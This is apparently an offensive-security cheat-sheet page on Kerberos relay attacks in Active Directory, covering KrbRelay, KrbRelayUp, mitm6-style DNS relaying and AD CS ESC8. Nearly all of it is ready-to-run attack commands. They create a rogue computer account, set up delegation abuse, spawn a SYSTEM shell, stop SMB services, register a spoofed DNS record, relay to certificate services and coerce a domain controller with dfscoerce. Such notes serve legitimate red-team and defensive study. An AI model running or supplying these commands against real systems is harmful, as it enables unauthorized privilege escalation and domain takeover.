Kerberos Relay

mitm6 + Kerberos DNS Relay + AD CS ESC8

https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/

Tools

KrbRelay

KrbRelayUp

RELAY

Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:

PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]

Perform RBCD with UPNs:

PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!

RBCD with UPNs

SPAWN

Execute a command as NT AUTHORITY\SYSTEM via RBCD abuse:

PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]

As @ShitSecure mentioned, executing the binary as a .NET Reflective Assembly from PowerShell will fail because the PowerShell process will have already initialized the security parameters for COM itself after having been launched, so CoInitializeSecurity will not contain those new parameters attempted to set by KrbRelay(Up).

RemoteKrbRelay

KrbRelay-SMBServer

Stop services with Cmd:

Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet

Stop services with PowerShell:

PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet

Last updated 1 month ago